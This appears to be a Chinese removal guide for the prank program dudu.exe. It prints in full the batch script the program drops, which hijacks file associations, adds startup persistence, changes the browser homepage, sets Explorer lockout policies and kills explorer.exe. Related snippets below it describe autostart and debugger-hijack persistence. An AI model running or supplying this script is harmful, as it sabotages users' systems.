恶作剧程序dudu.exe清除方法

恶作剧程序dudu.exe清除解决方案

dudu.exe运行后,当前用户临时文件夹中释放一个bt0577.bat批处理文件。这是个恶作剧程序。想办法阻止此.bat运行,用记事本打开该文件,可以看到下列内容:
@echo off
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .3g2=txtfile
assoc .dat=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
copy %0 "%windir%\system32\"
copy %0 "%systemdrive%"
copy %0 "%userprofile%\「开始」菜单\程序\启动\*.*"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start 
Page" /t reg_sz /dhttp://www.xiaowo.net/f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v 
"Default_Page_URL" /t reg_sz /dhttp://www.xiaowo.net/f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
NoFind /t REG_DWORD /d 1 /f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
NoRun /t REG_DWORD /d 0 /f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
NoClose /t REG_DWORD /d 1 /f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
HideClock /t REG_DWORD /d 1 /f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
StartMenuLogOff /t REG_DWORD /d 1 /f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
nodrives /t REG_DWORD /d 60 /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
taskkill /im explorer.exe /f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
NoFolderOptions /t REG_DWORD /d 1 /f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
NoViewContextMenu /t REG_DWORD /d 0 /f
reg add 
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v 
NoWinKeys /t REG_DWORD /d 1 /f
——————————————————————

如果bt0577.bat运行了,资源管理器进程被结束,用户只有一个空桌面可看了;文件关联被改得乱七八糟;三键调出任务管理器,重新启动资源管理器,用资源管理器查看,可见硬盘分区增加n个其实并未增加(可用PQ核实)。
此程序不能穿透影子。如果在影子中运行从恶作剧程序,重启一下就OK了。

(0)

相关推荐

  • 恶作剧程序dudu.exe清除方法

    恶作剧程序dudu.exe清除解决方案 dudu.exe运行后,当前用户临时文件夹中释放一个bt0577.bat批处理文件.这是个恶作剧程序.想办法阻止此.bat运行,用记事本打开该文件,可以看到下列内容: @echo off assoc .txt=exefile assoc .exe=txtfile assoc .htm=exefile assoc .html=exefile assoc .com=txtfile assoc .gho=txtfile assoc .rar=txtfile as

  • 在PyCharm下打包*.py程序成.exe的方法

    如下所示: 1. 在PyCharm下安装pyinstaller 2. 在Terminal下输入:"pyinstaller -F -w *.py" 就可以制作出exe.生成的文件放在同目录dist下. -F(注意大写)是所有库文件打包成一个exe,-w是不出黑色控制台窗口. 不加-F参数生成一堆文件,但运行快.压缩后比单个exe文件还小一点点. 加-F参数生成一个exe文件,运行起来慢. 以上这篇在PyCharm下打包*.py程序成.exe的方法就是小编分享给大家的全部内容了,希望能给大

  • SysLoad3.exe木马病毒的分析及清除方法

    使用前,请先断网,删除系统目录下的SysLoad3.exe以及1.exe,2.exe,...,7.exe,用IceSword删除临时目录下的那几个动态库.当任务管理器里没有iexplore.exe和notepad.exe的进程时,就可以运行这个恢复程序了. 特别注意:运行过程中,不要去运行其他程序,有可能你运行的那个程序就是带毒的!! [b]二:以下是分析和手动清除方法: 昨天下午加班回来,发现本本的行为相当诡异.看了看任务管理器,有几个Ie的进程和几个Notepad的进程有些可疑.然后看了看注

  • 推荐Searchnet.exe (trojan-spy.agent.iw) 清除方法 (有更新)

    [原创]Searchnet.exe (trojan-spy.agent.iw) 清除方法 (有更新) 最近霏凡论坛出现了一些网友反映电脑有一个叫Searchnet.exe的文件被杀软报毒但是无法清除(Kaspersky定名为trojan-spy.agent.iw).该程序位于C:\Program Files\Searchnet文件夹,里面有Searchnet.exe ServerHost.exe serveup.exe srvnet32.dll等文件(某些变种的Searchnet.exe是在C:

  • 各分区根目录释放shell.exe,autorun.inf 的病毒清除方法

    病毒名:Trojan-psw.Win32.Magania.os 卡巴 Worm.Win32.Delf.ysa 瑞星  文件变化:  释放文件 C:\WINDOWS\system32\Shell.exe C:\WINDOWS\system32\Shell.pci C:\pass.dic 各分区根目录释放 shell.exe autorun.inf autorun.inf内容 [Autorun] OPEN=Shell.exe shellexecute=Shell.exe shell\Auto\com

  • microsoft.exe病毒与清除方法

    最近用超级兔子检测出可疑程序microsoft.exe,位于C:\WINDOWS\system32下,在进程里关了 后又出现在进程里,在安全模式下删了后,重起又有了!~~请问这个是病毒吗?microsoft - microsoft.exe - 进程信息  进程文件: microsoft 或者 microsoft.exe  进程名称: GAOBOT Virus www.sstorm.cn我们的永久域名! 进程名称: microsoft.exe是高波GAOBOT病毒相关程序.该病毒利用Windows

  • IRC后门病毒及手动清除方法

    2004年年初,IRC后门病毒开始在全球网络大规模出现.一方面有潜在的泄漏本地信息的危险,另一方面病毒出现在局域网中使网络阻塞,影响正常工作,从而造成损失. 同时,由于病毒的源代码是公开的,任何人拿到源码后稍加修改就可编译生成一个全新的病毒,再加上不同的壳,造成IRC后门病毒变种大量涌现.还有一些病毒每次运行后都会进行变形,给病毒查杀带来很大困难.本文先从技术角度介绍IRC后门病毒,然后介绍其手工清除方法. 一.技术报告 IRC病毒集黑客.蠕虫.后门功能于一体,通过局域网共享目录和系统漏洞进行传

  • 常见木马的手工清除方法

    常见木马的手工清除方法 1. 冰河v1.1 v2.2 这是国产最好的木马 作者:黄鑫 清除木马v1.1 打开注册表Regedit 点击目录至: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 查找以下的两个路径,并删除 " C:windowssystem kernel32.exe" " C:windowssystem sysexplr.exe" 关闭Regedit 重新启动到MSDOS方式 删除

  • 防木马随程序启动的一个方法

    我们知道,有些木马是通过修改exe的文件关联来实现随EXE程序启动的.今天我在网上看到有另外一个显为人知的方法,就是通过在注册表HKEY_LOCAL_MACHINE\SOFTWARE  \Microsoft\Windows NT\  CurrentVersion\Image File  Execution Options 下新建一个注册表项,项名为A.exe,然后在下面新建一个字符串,字符串名为Debugger,字符串值就是程序B.exe的全路径. 很明显,这个是针对系统可以设置每个程序指定的纠

  • C#实现程序开机启动的方法

    本文实例讲述了C#实现程序开机启动的方法.分享给大家供大家参考,具体如下: //此方法把启动项加载到注册表中 //获得应用程序路径 string strAssName = Application.StartupPath + @"\" + Application.ProductName + @".exe"; //获得应用程序名 string ShortFileName = Application.ProductName; RegistryKey rgkRun = Re

随机推荐